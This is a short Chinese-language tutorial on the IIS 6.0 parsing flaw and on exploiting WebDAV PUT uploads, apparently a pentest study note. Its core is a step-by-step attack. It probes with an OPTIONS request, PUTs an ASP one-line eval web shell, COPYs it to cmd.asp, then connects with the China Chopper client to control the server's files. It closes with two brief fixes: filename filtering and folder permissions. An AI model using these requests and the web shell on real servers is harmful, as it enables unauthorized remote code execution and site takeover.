IIS6.0解析漏洞

ISS6.0解析漏洞介绍
（1） 当建立*.asa、.asp格式的文件夹时，其目录下的任意文件都将被IIS当作为asp文件解析。
（2） 当文件.asp;*.jpg IIS6.0同样会将文件当做asp文件解析。
注：微软目前也没有推出补丁，不认为是一个漏洞

ISS6.0 PUT上传原理
WeDAV基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1.在kali利用nikto探测URL通信协议情况。

2.探测是否存在PUT漏洞：
OPTIONS /HTTP1.1
Host:www.xxx.com

3.上传txt文本文件
PUT /*.txt HTTP1.1
Host:www.xxx.com
Content-Length:30

<%eval request(“shezhang”)%>

4.通过Move或Copy重名
COPY /*.txt HTTP1.1
Host:www.xxx.com
Destination:
http://www.xxx.com/cmd.asp

IIS6.0 PU上传利用
使用中国菜刀，连接目录中上传的木马文件，操作站点系统中的文件。


Iss6.0默认的可执行文件
除了asp还包括这三种：
/test.asa（<%=now()%>）
/test.cer
/test.cdx

Iss6.0解析配置

IIS6.0的修复方案
1.目前尚无微软官方的补丁，可以通过编写正则，阻止上传xx.asp;.jpg类型的文件名

2.做好权限设置，限制用户创建文件夹